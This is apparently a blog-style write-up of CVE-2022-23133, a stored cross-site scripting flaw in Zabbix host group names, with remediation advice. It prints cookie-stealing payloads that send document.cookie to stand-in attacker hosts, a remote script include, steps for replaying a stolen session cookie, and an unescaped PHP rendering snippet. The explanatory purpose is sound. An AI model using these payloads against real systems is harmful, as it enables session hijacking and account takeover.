CVE-2022-23133 - Stored XSS in Zabbix Hosts Groups Allows Complete Account Takeover

Zabbix is a popular open-source network monitoring solution used by organizations worldwide. In 2022, a serious vulnerability—CVE-2022-23133—was discovered that allows authenticated users to store cross-site scripting (XSS) payloads in Zabbix host groups. This security bug lets attackers steal session cookies and hijack accounts, potentially enabling them to take full control over a Zabbix instance.

In this post, I’ll walk you through how this vulnerability works, how it can be exploited, and what can be done to prevent such attacks. I’ll use simple language, direct explanations, and include code snippets for your reference. This article is meant to be exclusive and practical for readers with some web security experience.

What Is CVE-2022-23133?

CVE-2022-23133 is a stored XSS vulnerability found in the Zabbix web interface, specifically related to the management of host groups via the _Configuration_ menu. When an attacker who is already logged into Zabbix (even with reduced privileges) creates a new host group and injects malicious JavaScript in its name, this code is stored in the database. Any user who interacts with the host groups—such as searching for and adding hosts—will inadvertently execute the script in their own browser.

This means attackers can steal session cookies, perform actions as other users, or even compromise system administrators.

_Official advisory:_  
https://nvd.nist.gov/vuln/detail/CVE-2022-23133  
Zabbix Security Advisory

1. The Attacker Creates a Malicious Host Group

Once authenticated, the attacker navigates to _Configuration > Host Groups_ and creates a new group. Instead of a regular name, they use an XSS payload as the group name:

<script>
  // Steal current user's session cookie
  fetch('https://attacker-server.com/steal?cookie='; + document.cookie);
</script>

!Malicious group creation

The above is a simple script. In real attacks, it would be more stealthy, e.g., hidden in an image onerror event or obfuscated to avoid detection:

<img src=x onerror="fetch('https://attacker-server.com/?c='+document.cookie)">

2. Victim Triggers The Payload

Now, the payload is safely stored in the Zabbix database. Whenever any other user (including admins) searches for host groups (e.g., while creating a new host or filtering the group list), the name is rendered in the browser without proper sanitization.

!Payload triggers on search

At this point, the attack code runs in the victim’s browser, sending their session cookie straight to the attacker.

3. Session Hijacking & Full Takeover

With the stolen cookie in hand, the attacker can impersonate the victim. Many Zabbix deployments use session cookies for authentication. If the attacker sets this cookie in their own browser, they become the victim—without knowing the password.

Here’s a basic example of cookie installation in Chrome developer tools

document.cookie = "zbx_sessionid=[stolen session value]; path=/; domain=your-zabbix.com";

Now, on refresh, you’re logged in as the victim. If the infected user is an admin, the entire monitoring system is compromised.

Import Details from Zabbix Source

The vulnerable code is in the host group list rendering.

// Example: vulnerable rendering
foreach ($groups as $group) {
    echo "<option value=\"{$group['groupid']}\">{$group['name']}</option>";
}

Proper escaping should be applied

// Safer: Using htmlspecialchars
echo "<option value=\"{$group['groupid']}\">".htmlspecialchars($group['name'])."</option>";

Without htmlspecialchars, any HTML or JavaScript in a group name is rendered as-is—and that’s the core of this vulnerability.

Exploit Scenario in Real World

Let’s say you have a Zabbix instance shared by several departments. John from IT adds a group named:

<script src="https://evil.example.com/x.js"></script>;

When anyone from management visits the host group list or tries to move a host, their malware runs, sending session cookies to the attacker. Thanks to Zabbix’s permissions model, even a low-privileged user can compromise an admin this way.

Remediation

- Upgrade: Update Zabbix to the latest version Download
- Sanitize Input: Never trust user input. Always use appropriate escaping (e.g., htmlspecialchars) when rendering to HTML.
- Limit Host Group Creation: Avoid giving users permission to create host groups unless absolutely necessary.
- Monitor for Suspicious Group Names: Scan your groups for <script>, <img>, onerror, and similar XSS attack vectors.

References

- CVE-2022-23133 at NVD
- Zabbix Advisory - ZBX-20350
- Patch Commit Example
- OWASP XSS Prevention Cheat Sheet

Conclusion

CVE-2022-23133 is a reminder that even internal web apps are exposed to dangerous attacks if input is not sanitized. Stored XSS can give attackers everything they need—no need to guess passwords when cookies are up for grabs. If you run Zabbix, patch today!

Timeline

Published on: 01/13/2022 16:15:00 UTC
Last modified on: 02/10/2022 07:53:00 UTC